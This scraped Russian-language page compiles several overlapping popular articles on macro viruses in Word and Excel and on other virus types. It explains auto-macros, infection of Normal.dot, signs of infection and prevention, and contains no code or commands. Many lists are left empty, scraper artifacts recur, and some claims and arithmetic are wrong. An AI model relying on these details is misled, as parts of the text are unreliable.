Какие файлы заражают макро вирусы

Какие файлы заражают макро вирусы

MS Word/Excel/Office 97-вирусы:
общие сведения

Физическое расположение вируса внутри файла зависит от его формата, который в случае продуктов Microsoft чрезвычайно сложен: каждый файл-документ Word, Office 97 или таблица Excel представляют собой последовательность блоков данных (каждый из которых также имеет свой формат), объединенных между собой при помощи большого количества служебных данных. Этот формат носит название OLE2 (Object Linking and Embedding). Структура файлов Word, Excel и Office 97 (OLE2) напоминает усложненную файловую систему дисков DOS: «корневой каталог» файла-документа или таблицы указывает на основные подкаталоги различных блоков данных, несколько «таблиц FAT» содержат информацию о расположении блоков данных в документе и т. д.

Более того, система Office Binder, поддерживающая стандарты Word и Excel, позволяет создавать файлы, одновременно содержащие один или несколько документов в формате Word и одну или несколько таблиц в формате Excel, причем Word-вирусы способны при этом поражать Word-документы, а Excel-вирусы — Excel-таблицы, и все это возможно в пределах одного дискового файла. То же справедливо и для Office 97.

Следует отметить, что MS Word версий 6 и 7 позволяет шифровать присутствующие в документе макросы. Таким образом, некоторые Word-вирусы присутствуют в зараженных документах в зашифрованном (Execute only) виде.

Большинство известных вирусов для Word несовместимы с национальными (в том числе с русской) версиями Word или, наоборот, рассчитаны только на локализованные версии Word и не работают под английской версией. Однако вирус в документе все равно остается активным и может заражать другие компьютеры с установленной на них соответствующей версией Word.

Вирусы для Word могут заражать компьютеры любого класса, а не только IBM PC. Заражение возможно в том случае, если на данном компьютере установлен текстовый редактор, полностью совместимый с Microsoft Word версии 6 или 7 (например, MS Word for Macintosh). То же справедливо и для MS Excel и MS Office 97.

Интересно, что форматы документов Word, таблиц Excel и особенно Office 97 имеют следующую особенность: в файлах-документах и таблицах присутствуют «лишние» блоки данных, т. е. данные, никак не связанные с редактируемым текстом или таблицами, либо случайно оказавшиеся там копии прочих данных файла. Причиной возникновения таких блоков данных является кластерная организация данных в OLE2-документах и таблицах. Даже если введен всего один символ текста, то под него выделяется один или даже несколько кластеров данных. При сохранении документов и таблиц в кластерах, не заполненных «полезными» данными, остается «мусор», который попадает в файл вместе с прочими данными. Количество «мусора» в файлах может быть уменьшено отменой пункта настройки Word/Excel «Allow Fast Save», однако это лишь уменьшает общее количество «мусора», но не убирает его полностью.

ледует также отметить тот факт, что некоторые версии OLE2.DLL содержат небольшой недочет, в результате которого при работе с документами Word, Excel и особенно Office 97 в блоки «мусора» могут попасть случайные данные с диска, включая конфиденциальные (удаленные файлы, каталоги и т. д.).

MS Word/Excel/Office 97-вирусы:
принципы работы

При работе с документом MS Word версий 6 и 7 выполняет различные действия: открывает документ, сохраняет, печатает, закрывает и т. д. При этом Word ищет и выполняет соответствующие встроенные макросы: при сохранении файла по команде File/Save вызывается макрос FileSave, при сохранении по команде File/SaveAs — FileSaveAs, при печати документов — FilePrint и т. д., если, конечно, таковые макросы определены.

Существуют также несколько «автомакросов», автоматически вызываемых при различных условиях. Например, при открытии документа Word проверяет его на наличие макроса AutoOpen. Если такой макрос присутствует, то Word выполняет его. При закрытии документа Word выполняет макрос AutoClose, при запуске Word вызывается макрос AutoExec, при завершении работы — AutoExit, при создании нового документа — AutoNew. Похожие механизмы, но с другими именами макросов и функций, используются и в Excel/Office 97.

Макровирусы, поражающие файлы Word, Excel или Office 97, как правило пользуются одним из трех вышеперечисленных приемов:

Бывают также полувирусы, которые не используют перечисленные приемы и размножаются, только если пользователь самостоятельно запускает их на выполнение.

Большинство макровирусов содержат все свои функции в виде стандартных макросов MS Word/Excel/Office 97. Существуют, однако, вирусы, использующие приемы скрытия своего кода и хранящие свой код в виде не-макросов. Известны три подобных приема. Все они используют возможность макросов создавать, редактировать и исполнять другие макросы. Как правило, подобные вирусы имеют небольшой (иногда полиморфный) макрос-загрузчик, который вызывает встроенный редактор макросов, создает новый макрос, заполняет его основным кодом вируса, выполняет и затем, как правило, уничтожает, чтобы скрыть следы присутствия вируса. Основной код таких вирусов присутствует либо в теле самого вируса в виде текстовых строк, либо хранится в области переменных документа или в области Auto-text.

Алгоритм работы
макровирусов для Word

Большинство известных Word-вирусов (версий 6, 7 и Word 97) при запуске переносят собственный код в область глобальных макросов документа («общие» макросы).

При выходе из Word глобальные макросы (включая макросы вируса) автоматически записываются в DOT-файл глобальных макросов (обычно таким файлом является NORMAL.DOT). Таким образом, вирус активизируется в тот момент, когда Word грузит глобальные макросы.

Затем вирус переопределяет (или уже содержит в себе) один или несколько стандартных макросов (например, FileOpen, FileSave, FileSaveAs, FilePrint) и перехватывает таким образом команды работы с файлами. При вызове этих команд заражается файл, к которому идет обращение. Для этого вирус конвертирует файл в формат Template (что делает невозможными дальнейшие изменения формата файла, т. е. конвертирование в какой-либо не-Template формат) и записывает в файл свои макросы, включая Auto-макрос.

Другой способ внедрения вируса в систему базируется на так называемых «Add-in» файлах, т. е. файлах, являющихся служебными дополнениями к Word. В этом случае NORMAL.DOT не изменяется, а Word при запуске загружает макросы вируса из файла (или файлов), определенного как «Add-in». Этот способ практически полностью повторяет заражение глобальных макросов за тем лишь исключением, что макросы вируса хранятся не в NORMAL.DOT, а в каком-либо другом файле.

Возможно также внедрение вируса в файлы, расположенные в каталоге STARTUP. В этом случае Word автоматически подгружает файлы-шаблоны из этого каталога, но такие вирусы пока не встречались.

Обнаружение макровируса

Характерными признаками присутствия макровирусов являются:

Для проверки системы на предмет наличия вируса можно использовать пункт меню Tools/Macro. Если обнаружены «чужие макросы», то они могут принадлежать вирусу. Однако этот метод не работает в случае стелс-вирусов, которые «запрещают» работу этого пункта меню, что, в свою очередь, является достаточным основанием считать систему зараженной.

Многие вирусы имеют ошибки или некорректно работают в различных версиях Word/Excel, в результате чего эти программы выдают сообщения об ошибке, например:

WordBasic Err = номер ошибки.

Если такое сообщение появляется при редактировании нового документа или таблицы и при этом заведомо не используются какие-либо пользовательские макросы, то это также может служить признаком заражения системы. Также сигналом о вирусе являются изменения в файлах и системной конфигурации Word, Excel и Windows. Многие вирусы тем или иным образом меняют пункты меню Tools/Options — разрешают или запрещают функции «Prompt to Save Normal Template», «Allow Fast Save», «Virus Protection». Некоторые вирусы устанавливают на файлы пароль при их заражении. Большое количество вирусов создают новые секции и/или опции в файле конфигурации Windows (WIN.INI).

Естественно, что к проявлениям вируса относятся такие «неожиданности», как появление сообщений или диалогов с достаточно странным содержанием или на языке, не совпадающем с языком установленной версии Word/Excel.

Восстановление
пораженных объектов

В большинстве случаев процедура «лечения» зараженных файлов и дисков сводится к запуску подходящего антивирусного программного обеспечения. Но бывают ситуации, когда обезвреживание вируса приходится осуществлять самостоятельно, т. е. «руками».

Для обезвреживания вирусов Word и Excel достаточно сохранить всю необходимую информацию в формате не-документов и не-таблиц. Наиболее подходящим является текстовый RTF-формат, включающий практически всю информацию из первоначальных документов и не содержащий макросов.

Затем следует выйти из Word/Excel, уничтожить все зараженные Word-документы, Excel-таблицы, NORMAL.DOT для Word и все документы/таблицы в STARTUP-каталогах Word/Excel. После этого следует запустить Word/Excel и восстановить документы/таблицы из RTF-файлов.

В результате этой процедуры вирус будет удален из системы, а практически вся информация останется без изменений. Однако этот метод имеет ряд недостатков. Основным является трудоемкость конвертирования документов и таблиц в RTF-формат, если их число велико. К тому же в случае Excel необходимо отдельно конвертировать все Листы (Sheets) в каждом Excel-файле.

Другим существенным недостатком является потеря нормальных макросов, использующихся при работе. Поэтому перед запуском описанной процедуры следует сохранить их исходный текст, а после обезвреживания вируса восстановить необходимые макросы в первоначальном виде.

Откуда берутся вирусы
и как избежать заражения

Основным источником вирусов на сегодняшний день является Internet. Наибольшее число заражений вирусом происходит при обмене письмами в форматах MS Word/Office 97: пользователь зараженного макровирусом редактора, сам того не подозревая, рассылает «инфицированные» письма своим адресатам, а они рассылают новые письма и т. д.

Предположим, что пользователь ведет переписку с пятью адресатами, каждый из которых, в свою очередь, ведет переписку также с пятью адресатами. После посылки «вирусного» письма все пять компьютеров, получившие его, оказываются зараженными. На втором уровне рассылки будут заражены уже 1+5+20=26 компьютеров. Если адресаты сети обмениваются письмами раз в день, то к концу рабочей недели (за 5 дней) зараженными окажутся как минимум 1+5+20+ 80+320=426 компьютеров. Нетрудно подсчитать, что за 10 дней заразятся более ста тысяч компьютеров! Причем каждый день их количество будет учетверяться.

Описанный случай распространения вируса наиболее часто регистрируется антивирусными компаниями. Но нередки случаи, когда зараженный файл-документ или таблица Excel по причине недосмотра попадает в списки рассылки коммерческой информации какой-либо крупной компании. В этом случае пострадают уже не пять, а сотни или даже тысячи абонентов таких рассылок, которые затем разошлют зараженные файлы десяткам тысячам своих абонентов.

Файл-серверы общего пользования и электронные конференции также служат одним из основных источников распространения вирусов. Практически каждую неделю приходит сообщение о том, что кто-то из пользователей заразил свой компьютер вирусом, который был получен из BBS, ftp-сервера или электронной конференции.

При этом часто зараженные файлы «закачиваются» автором вируса на несколько BBS/ftp или рассылаются по нескольким конференциям под видом новых версий какого-либо программного обеспечения (вплоть до антивирусов).

В случае массовой рассылки вируса по файл-серверам BBS/ftp пораженными одновременно могут оказаться тысячи компьютеров, однако в большинстве случаев «рассылаются» DOS- или Windows-вирусы, скорость распространения которых в современных условиях значительно ниже, чем у их макрособратьев. По этой причине подобные инциденты практически никогда не кончаются массовыми эпидемиями.

Третий путь быстрого распространения вирусов — локальные сети. Если не принимать необходимых мер защиты, то зараженная рабочая станция при входе в сеть заражает один или несколько служебных файлов на сервере, различное программное обеспечение, стандартные документы-шаблоны или Excel-таблицы, применяемые в фирме, и т. д.

Опасность представляют также компьютеры, установленные в учебных заведениях. Если один из студентов принес на своих дискетах вирус и заразил какой-либо из учебных компьютеров, то очередную «заразу» получат и все остальные студенты, работающие на этом компьютере.

То же относится и к домашним компьютерам, если на них работает более одного человека. Нередки ситуации, когда сын-студент (или дочь), работая на многопользовательском компьютере в институте, перетаскивают вирус на домашний компьютер, в результате чего вирус попадает в компьютерную сеть фирмы папы или мамы.

В заключение хочется отметить, что, несмотря на кажущуюся сложность борьбы с макровирусами, обезопасить себя от этой «инфекции» при спокойном и грамотном подходе к проблеме не столь уж сложно.

Достаточно редко, но до сих пор вполне реально заразить свой компьютер вирусом при его ремонте или профилактическом осмотре. Ремонтники — тоже люди, и некоторым из них бывает свойственно наплевательски относиться к элементарным правилам компьютерной безопасности.

[an error occurred while processing this directive]

[an error occurred while processing this directive]

Источник

Что такое макровирусы?

В этой статье речь пойдет о макровирусах, в частности, о тех представителях этого многочисленного семейства, которые поражают документы Word.

зачастую недооценивают макровирусы, не учитывая, что макрос, написанный, например, на языке VBA и интегрированный в документ Word или Excel, обладает всеми теми же возможностями, что и обычная программа. Он может отформатировать Ваш винчестер, удалить любые файлы по выбору, скопировать какую-либо конфиденциальную информацию (например, пароли) и отправить ее по электронной почте

Что такое макровирусы
Макровирусы — это программы, написанные на так называемых макроязыках, встроенных в некоторые системы обработки данных (текстовые и графические редакторы, электронные таблицы ). Для своего размножения такие вирусы используют возможности макроязыков, они переносятся от одного зараженного файла к другому. Наибольшее распространение получили макровирусы для Microsoft Word, Excel. Макровирусы получают управление при открытии или закрытии зараженного файла, перехватывают стандартные файловые функции и затем заражают файлы, к которым каким-либо образом идет обращение. Большинство макровирусов являются резидентными вирусами: они активны не только в момент открытия или закрытия файла, но до тех пор, пока активен сам текстовый или табличный редактор (а некоторые могут оставаться в оперативной памяти до выключения ПК!). Легкость создания макровирусов поражает воображение, все находится буквально под рукой: достаточно запустить Word, выбрать меню Сервис — Макрос — Редактор Visual Basic — и запустится программная среда VBA (Visual Basic for Application)!

Принцип «работы» макровирусов
При работе с документом MS Word выполняет различные действия: открывает документ, сохраняет, печатает, закрывает При этом Word ищет и выполняет соответствующие встроенные макросы: при сохранении файла по команде Файл — Сохранить вызывается макрос FileSave, при сохранении по команде Файл — Сохранить как…FileSaveAs, при печати по команде Печать… — FilePrint Существуют также несколько макросов, автоматически вызываемых при возникновении соответствующих ситуаций. Например, при открытии документа Word проверяет его на наличие макроса AutoOpen. Если такой макрос присутствует, то Word выполняет его. При закрытии документа Word выполняет макрос AutoClose, при запуске Word вызывается макрос AutoExec, при завершении работы — AutoExit, при создании нового документа — AutoNew (похожие механизмы, но с другими именами макросов, используются и в Excel).

Макровирусы, поражающие файлы Word, как правило, пользуются одним из четырех приемов:
1) в вирусе присутствует автомакрос;
2) в вирусе переопределен один из стандартных системных макросов (ассоциированный с каким-либо пунктом меню);
3) макрос вируса автоматически вызывается при нажатии на какую-либо клавишу или комбинацию клавиш;
4) вирус начинает размножаться только в том случае, если пользователь запускает его на выполнение.

Основной механизм заражения такой: когда мы открываем зараженный документ Word, макровирус копирует свой код в область глобальных макросов документа. А при выходе из Word‘а глобальные макросы (включая макросы вируса) автоматически записываются в dot-файл глобальных макросов (шаблон Normal.dot).

Затем вирус переопределяет стандартные макросы (например, FileOpen, FileSave, FileSaveAs, FilePrint) и с их помощью перехватывает команды работы с файлами. При вызове этих команд заражается файл, к которому идет обращение.

Как обнаружить макровирусы
Характерными признаками присутствия макровирусов являются:
1) невозможность сохранения зараженного документа Word в другой формат (по команде Сохранить как…);
2) невозможность записи документа в другой каталог или на другой диск командой Сохранить как…;
3) невозможность сохранения внесенных изменений в документ (команда Сохранить);
4) недоступность вкладки «Уровень безопасности» (меню Сервис — Макрос — Безопасность…);
5) т.к. многие вирусы написаны с ошибками (или некорректно работают в различных версиях пакета Microsoft Office), то возможно появление соответствующих системных сообщений с кодом ошибки;
6) другие «странности» в поведении документов Word;
7) зачастую макровирусы можно обнаружить визуально. Дело в том, что большинство вирусописателей отличаются тщеславием: в свойствах файла Word (окно Свойства вызывается по щелчку правой кнопки мыши — выбрать из контекстного меню Свойства) на вкладке Сводка заполняют поля ввода (Название, Тема, Автор, Категория, Ключевые слова и Комментарий). Эту информацию (как правило, в макровирусах она пишется смесью латиницы с кириллицей и включает — в числе прочего — некоторые бессмысленные слова, типа муниципализмо ) можно увидеть при наведении указателя мыши на значок файла Word — она появляется во всплывающей подсказке и внизу слева в папке, в окошке Подробно (если включено Использование типичных задач для папок).

Источник

Принципы работы

Макровирусы, поражающие файлы Word, Excel или Office 97, как правило пользуются одним из трех нижеперечисленных приемов:

Бывают также полувирусы, которые не используют перечисленные приемы и размножаются, только если пользователь самостоятельно запускает их на выполнение.

Большинство макровирусов содержат все свои функции в виде стандартных макросов MS Word/Excel/Office 97. Существуют, однако, вирусы, использующие приемы скрытия своего кода и хранящие свой код в виде не-макросов. Известны три подобных приема. Все они используют возможность макросов создавать, редактировать и исполнять другие макросы. Как правило, подобные вирусы имеют небольшой (иногда полиморфный) макрос-загрузчик, который вызывает встроенный редактор макросов, создает новый макрос, заполняет его основным кодом вируса, выполняет и затем, как правило, уничтожает, чтобы скрыть следы присутствия вируса. Основной код таких вирусов присутствует либо в теле самого вируса в виде текстовых строк, либо хранится в области переменных документа или в области Auto-text.

Источник

Что такое макровирус?

Какие файлы заражают макро вирусы

Макровирусы добавляют свой код в макросы для создания документов, электронных таблиц и других файлов данных.

Первый макровирус, получивший название Concept, появился в июле 1995. Впоследствии макровирусы (чаще всего заражающие документы Word) стали основным типом вирусов и оставались таковыми до конца прошлого века, когда Microsoft по умолчанию отключила макросы в Office (версии Office 2000 и выше).

С тех пор киберпреступникам приходилось делать попытки обмануть своих жертв, вынуждая их включать макросы до того, как их зараженный макрос сможет заработать.

Какие файлы заражают макро вирусы

Как распространяются макровирусы

Макровирусы чаще всего встречаются в документах или вставляются как вредоносный код в программы обработки текстов. Они могут содержаться в документах, прикрепленных к электронным письмам, или код может быть загружен после нажатия «фишинговых» ссылок в баннерной рекламе или URL-адресах.

Макровирус похож на троянскую программу: он может выглядеть вполне безопасным, и пользователи не сразу замечают какие-либо вредоносные последствия. Однако в отличие от троянских программ макровирусы могут копировать самих себя и заражать другие компьютеры.

Риски

Основной опасностью макровирусов является их способность быстро распространяться. Как только зараженный макрос запущен, все другие документы на компьютере пользователя подвергаются заражению.

Некоторые из этих вирусов производят изменения в текстовых документах (например, пропускают или вставляют слова), другие получают доступ к аккаунтам электронной почты и отправляют копии зараженных файлов всем контактам пользователя, а те в свою очередь открывают эти файлы, поскольку они присланы из надежного источника.

Эти вирусы также могут быть предназначены для удаления или заражения сохраненных данных. Кроме того, важно отметить, что макровирусы являются кросс-платформенными: они могут заражать компьютеры Windows и Mac, используя один и тот же код.

Любая программа, использующая макросы, может работать как хост, и любая копия зараженной программы, отправленная по электронной почте, хранящаяся на диске или на USB-накопителе, будет содержать вирус.

Чтобы удалить эти вирусы, следует использовать надежное защитное ПО, которое предоставляет специальные средства обнаружения и удаления вирусов. Обычные проверки очистят любые зараженные документы и предотвратят загрузку новых компьютерных вирусов.

Типы макровирусов

Встречается несколько форм макровирусов. Некоторые считают, что эти вирусы являются пережитком конца 1990-х годов, но в последние годы они вернулись к активной деятельности, заставляя пользователей проявлять особую бдительность.

Источник

Что такое макровирусы, какие файлы заражают и как защитить личные данные

Какие файлы заражают макро вирусы

Макровирусы — это потенциально нежелательные программы, написанные на макроязыке, которые встраиваются в графические и текстовые системы обработки. Такое определение дает информатика.

Какие файлы заражают макровирусы

Ответ: Они встраиваются в программы для работы с текстом, которые создают и работают с макросами (Microsoft Excel, Word, Office 97 (Visual Basic), Notepad++ и другие). Данные вирусы встречаются достаточно часто, так как создать их проще простого.

Способы проникновения

После того как выяснили, что такое макровирусы, разберемся каким образом они проникают в систему.

При скачивании документов из Интернета стоит быть крайне внимательными и аккуратными. Большинство пользователей недооценивают их, совершая тем самым грубейшую ошибку.

Особенностью является простой способ размножения, который позволяет за короткий срок заразить максимальное количество объектов. Благодаря возможностям макроязыков, при закрытии или открытии зараженного документа они проникают в программы, к которым идет обращение.

Какие файлы заражают макро вирусы

То есть, при использовании графического редактора макровирусы заражают все, что связано с ним. Более того, некоторые активничают все время, пока текстовый или графический редактор работают, или вовсе до полного выключения ПК.

В чем заключается принцип работы

Какие файлы заражают макро вирусыИх действие происходит по следующему принципу: работая с документами, Microsoft Word выполняет разнообразные команды, отдающиеся на макроязыке. Первым делом программа проникает в главный шаблон, через который открываются все файлы этого формата. При этом вирус копирует свой код в макросы, которые обеспечивают доступ к главным параметрам. Выходя из приложения происходит автоматическое сохранение в «.dot». Далее он попадает в стандартные макросы, перехватывая отправляемые другим файлам команды, инфицируя и их.

Заражение осуществляется в следующих случаях:

Такие зловреды поражают обычно все объекты, созданные и привязанные к приложениям на макроязыке.

Какой вред наносят

Не стоит недооценивать макровирусы, так как они относятся к полноценным вирусам и наносят компьютерам значительный вред. Способны легко удалить, скопировать или отредактировать объекты, содержащие, в том числе, и личную информацию. Более того, им также доступна передача информации другим людям с помощью электронной почты. По сути чем-то напоминают привычные черви, трояны и рекламные программы.

Какие файлы заражают макро вирусы

Более сильные утилиты способны отформатировать жесткий диск или получить контроль над ПК. Именно поэтому мнение, что компьютерные вирусы подобного типа несут в себе опасность исключительно для графических и текстовых редакторов, ошибочное. Ведь такие утилиты как Word и Excel работают во взаимодействии с целым рядом других приложений, которые в этом случае также подвергаются опасности.

Как распознать зараженный файл

Как правило, объект, зараженный так называемым макровирусом вычислить довольно просто. Содержит вредоносное ПО, которое блокирует доступ к некоторым привычным функциям. Распознается по следующим признакам:

Кроме того, угроза зачастую легко обнаруживается визуально. Разработчики обычно указывают во вкладке «Сводка» такую информацию, как название утилиты, категория, тема, комментарии и имя автора. Это позволяет избавиться от макровируса значительно быстрее и проще. Вызвать ее можно при помощи контекстного меню.

Способы удаления

Обнаружив подозрительный файл или документ, первым делом просканируйте его антивирусом. При обнаружении угрозы антивирусы попробуют вылечить его, а в случае неудачи полностью закроют к нему доступ.

В случае если был заражен весь компьютер, следует воспользоваться аварийным загрузочным диском, который содержит антивирус с последней базой данных. Он проведет сканирование винчестера и обезвредит все найденные им угрозы.

Если защититься таким образом не получается и аварийного диска нет, то следует попробовать метод «ручного» лечения:

Таким образом, вы удалите макровирус с зараженного документа, однако это ни в коем случае не значит, что он не остался в системе. Именно поэтому рекомендую при первой возможности просканировать ПК антивирусом или специальными бесплатными сканерами (не требуют установки и не конфликтуют с другими антивирусными продуктами).

Основные отличия от других типов угроз

А теперь немного поговорим о том, чем они отличаются от других типов угроз.

Рекомендации по защите

Процедура лечения и очистки ПК достаточно сложна, поэтому лучше предотвратить попадание зловреда еще на начальных этапах. Вот список рекомендаций по защите устройства.

Источник

Компьютерные вирусы: опасное вторжение

В статье дана классификация вирусов по деструктивным возможностям, по среде обитания (сетевые, файловые, загрузочные, макровирусы, скрипт–вирусы) с поясняющим описанием, названиями и мерами профилактики.

Любой пользователь, независимо от наличия или отсутствия выхода в Интернет, хотя бы раз в своей жизни сталкивался с таким неприятным явлением как компьютерный вирус. Первой реакцией после обнаружения вирусной атаки, несомненно, является паника и страх за содержащуюся в компьютере информацию. Даже обладатель последней обновлённой версии популярной антивирусной программы подспудно в душе испытывает беспокойство. Ведь, как известно, сначала появляется вирус, и только потом через определённый промежуток времени – версия антивируса, способная его обнаруживать и обезвреживать.

Какие файлы заражают макро вирусыПоследствия действий вирусов весьма разнообразны. По размеру причиняемого вредоносного воздействия вирусы чисто условно можно разделить на следующие группы:

Чтобы не стать жертвой в войне за безопасность информации, обладателю «железа» следует иметь привычку постоянно анализировать работу компьютера. Если прослеживается одна или несколько из перечисленных ниже ситуаций, то срочно принимайте меры и проверяйте компьютер на наличие вирусов разными антивирусными программами.

Основные признаки проявления вирусов:

Для того чтобы бороться с врагом, нужно знать его в лицо. В зависимости от выявленного типа вируса и принимаются соответствующие меры для его блокировки или уничтожения.

Все существующие на данный момент времени компьютерные вирусы условно распределяют на следующие группы.

Файловые вирусы

Какие файлы заражают макро вирусыФайловые вирусы:

Файловые вирусы используют файловую систему операционки. Такие вирусы внедряются в исполняемые файлы различных форматов (EXE, COM, BAT, SYS и др.), активизируясь при их запуске и обосновываясь в оперативной памяти компьютера. Эти вирусы являются активными (могут заражать другие файлы) вплоть до момента выключения компьютера или перезагрузки системы. При этом файловые вирусы не могут заразить файлы данных (например, содержащие изображение или звук).

Профилактическая защита от файловых вирусов: запретить запуск на выполнение файлов, полученных из сомнительного источника и предварительно не проверенных антивирусными программами.

Загрузочные вирусы

Загрузочный вирус (boot) заражает загрузочный сектор винчестера и вынуждает систему при её перезапуске передать управление не программному коду загрузчика операционной системы, а коду вируса.

Практически все загрузочные и файловые вирусы являются резидентными, то есть находятся в оперативной памяти компьютера и, перехватывая обращения операционной системы, внедряются в объекты, стирая данные и изменяя атрибуты файлов. В отличии от нерезидентных вирусов, такие вирусы активны не только в моменты запуска и работы заражённой программы, но и после завершения работы, вплоть до выключения компьютера.

Лечение от резидентных вирусов затруднено, так как даже после удаления заражённых файлов с диска, вирус остаётся в оперативной памяти, и возможно повторное заражение файлов. Для профилактики и своевременного обнаружения вторжений резидентных вирусов рекомендуется использовать антивирусные блокировщики (сторожа, фильтры) и установку в BIOS компьютера защиты загрузочного сектора от изменений.

Макровирусы

Макровирусы:

Макровирусы являются программами на языках, встроенных в системы обработки данных (текстовые редакторы, электронные таблицы и т.д.), являясь макрокомандами (макросами), которые пользователь встраивает в документ.

Используя возможности макроязыков для размножения, они переносят себя из одного зараженного файла в другие. Вирусы этого типа получают управление при открытии зараженного файла и инфицируют файлы, к которым впоследствии идет обращение из соответствующего офисного приложения – Word, Excel и пр. Макровирусы являются ограниченно резидентными, т.е. угроза заражения прекращается только после закрытия приложения.

Профилактическая защита от макровирусов состоит в предотвращении запуска вируса. При открытии документа в приложениях Word или Excel сообщается о присутствии в них макрокоманд (которые потенциально могут быть заражены вирусами) и предлагается запретить их загрузку. Выбор запрета на загрузку макросов надёжно защитит компьютер от заражения макровирусами, однако заодно отключит и полезные макросы, содержащиеся в документе.

Скрипт–вирусы

Скрипт–вирусы:

Встречаются и такие виды скрипт-вирусов, которые условно можно отнести к «злым шуткам». Такие вирусы значительно затрудняют и осложняют работу с компьютером, открывая бесконечное множество окон (чаще всего, рекламных), самостоятельно перемещая элементы рабочего стола и т.д.

Профилактической защитой от скрипт – вирусов будет служить наложение в браузере запрета загрузки активных элементов веб-страницы на локальный компьютер.

Смешанные типы

Помимо перечисленных групп вирусов, существует большое количество их сочетаний: например, файлово–загрузочный вирус, заражающий как файлы, так и загрузочные сектора дисков, или сетевой макровирус, который не только заражает редактируемые документы, но и рассылает свои копии по электронной почте.

Трояны

Трояны:

Сетевые черви

Сетевые черви:

По сети могут распространяться абсолютно любые вирусы. Можно получить, например, заражённые файлы с серверов файловых архивов. Специфические сетевые вирусы используют для своего распространения электронную почту и Всемирную паутину.

Какие файлы заражают макро вирусыИнтернет-черви (worm) – это вирусы, которые распространяются в компьютерной сети во вложенных в почтовое сообщение файлах. Автоматическая активизация червя и заражение компьютера происходит при просмотре сообщения. Опасность таких вирусов заключается в том, что они находятся в неактивном состоянии, а активизируются по определённым датам и уничтожают файлы на дисках заражённого компьютера.

Кроме того, интернет-черви часто являются троянами, выполняя действия «троянского коня», внедрённого в операционную систему. Такие вирусы похищают, например, идентификатор и пароль пользователя для доступа в Интернет и передают их на определённый почтовый адрес. В результате, злоумышленники получают возможность доступа в Интернет за деньги ничего не подозревающего юзера. Точно таким же образом от Вас могут «уплыть» и данные, необходимые для доступа к вашему кошельку WebMoney и другим платёжным системам Интернета.

Сетевые черви способны распространяться самостоятельно и с огромной скоростью, часто вызывая настоящие эпидемии. Цепная реакция их распространения основывается на том, что вирус, после заражения компьютера, начинает рассылать себя по всем адресам электронной почты, которые имеются в адресной книге пользователя (если это Email –червь). Кроме того, может происходить заражение по локальной сети, так как червь перебирает все локальные диски и сетевые диски с правом доступа и копируется туда под случайным именем.

Профилактическая защита от интернет-червей состоит в том, что не рекомендуется открывать вложенные в почтовые сообщения файлы, полученные из сомнительных источников.

Какие файлы заражают макро вирусыС каждым днём растёт количество пользователей Интернет. Вместе с тем, растёт количество вредоносного программного обеспечения. В арсенале хакеров и вирусописателей находится множество способов для создания вируса:

Но любой пользователь, располагая знаниями о вирусах и их воздействиях, установивший надёжную антивирусную программу (а лучше две), в силах обезопасить свой компьютер или, хотя бы, снизить риск деструктивного вмешательства вирусов в его систему.

Источник

Макровирусы что это такое

Макровирус — это разновидность компьютерных вирусов, разработанных на макроязыках, встроенных в такие прикладные пакеты ПО, как Microsoft Office. Для своего размножения такие вирусы используют возможности макроязыков и при их помощи переносятся из одного зараженного файла в другие. Большая часть таких вирусов написана для MS Word.

Сегодня в сети витают тысячи вредоносных программ. Конечно, помнить каждую из них «в лицо» – невозможная, да и ненужная задача. Однако о некоторых все же стоит знать побольше по причине их опасности и широкой распространенности. В данном материале мы разберем, что это – макровирусы. А также почему важно адекватно оценивать их угрозу.

Макровирусы – это.

Первая половина названия вредоносного элемента произошла от слова «макрос». Это интегрированная составляющая документа MS Word или Excel, написанная на языке VBA. Макрос обладает довольно широкими возможностями: может отформатировать винчестер, удалить файлы, скопировать из хранящейся на ПК информации конфиденциальные данные и отправить их через электронный почтовый ящик. Отсюда выходит большая опасность поражения такого элемента.

Какие файлы заражают макро вирусы

Макровирус – это программа, написанная на макроязыке для дальнейшего встраивания в ряд систем обработки информации: графические и текстовые программы и редакторы, софт по работе с таблицами и т. д. Размножение вредоносных элементов происходит за счет возможностей макроязыков. Поэтому они довольно легко переносятся из документа в документ, от одного компьютера к другому. Какие файлы заражают макровирусы чаще всего? В основном это документы Word, Excel.

Как происходит распространение?

Заражение ПК случается довольно просто. Вам достаточно открыть или закрыть пораженный макровирусом файл на компьютере. Вредоносные элементы при этом перехватывают стандартные функции документа. А далее они начинают заражать все подобные файлы, к которым вы обращаетесь на своем устройстве.

Макровирусы – это еще и резидентные вредоносные элементы. То есть они активны не только в момент открытия/закрытия документа, но и на протяжении всей работы текстовой, графической или табличной программы! А некоторые из них способны даже оставаться в оперативной памяти компьютера вплоть до его выключения.

Какие файлы заражают макро вирусы

Надо отметить и чрезвычайную легкость их создания: злоумышленнику достаточно открыть «Ворд», зайти в «Сервис», после чего в «Макросы». Далее он выбирает редактор Visual Basic, где уже может писать вредоносную программу на языке VBA.

Принцип работы вируса

При реализации той или иной команды Word ищет и выполняет соответствующие макросы:

Подобные макросы, но с иными названиями используются и приложением Excel.

Чтобы поразить вордовский файл, вредоносная программа пользуется одним из данных приемов:

Какие файлы заражают макро вирусы

Макровирусы заражают файлы таковым образом:

Теперь определимся, как установить наличие на компьютере этих вредоносных элементов.

Обнаружение макровирусов

Файловые вирусы в текстах и таблицах возможно определить следующим образом:

Устранение проблемы

Любую беду проще всего, конечно, предотвратить. В данном случае на вашем компьютере должен стоять современный антивирус с постоянно обновляющейся базой угроз. Многие такие программы имеют монитор, загруженный в оперативную память. Он определяет зараженные файлы уже на попытке их открытия. Антивирус старается прежде всего вылечить такой документ, при неуспешности (что случается очень редко) блокирует доступ к нему.

Какие файлы заражают макро вирусы

Если же вы обнаружили угрозу на незащищенном компьютере, то необходимо скачать антивирус или соответствующую утилиту, которая обнаружит, обезвредит или удалит зараженный файл. Важно также проявлять бдительность и самим: не открывать документы из неизвестных вам источников или же, в крайнем случае, перед этим сканировать их на наличие вредоносных элементов.

Макровирусы – угроза, распространяющаяся через текстовые и табличные файлы. Ее сегодня легко обнаружить и устранить, что при этом не умаляет опасности и вреда, приносимых этой вредоносной программой.

Какие файлы заражают макро вирусыМакровирусы – это потенциально нежелательные утилиты, написанные на микроязыках, которые встроены в графические и текстовые системы обработки. Какие файлы заражают макро вирусы? Ответ очевиден. Наиболее распространенные версии для программ Microsoft Excel, Word и Office 97. Данные вирусы встречаются достаточно часто, как создать их проще простого. Именно поэтому при скачивании документов из Интернета стоит быть крайне внимательными и аккуратными. Большинство пользователей недооценивают их, совершая тем самым грубейшую ошибку.

Как происходит заражение ПК

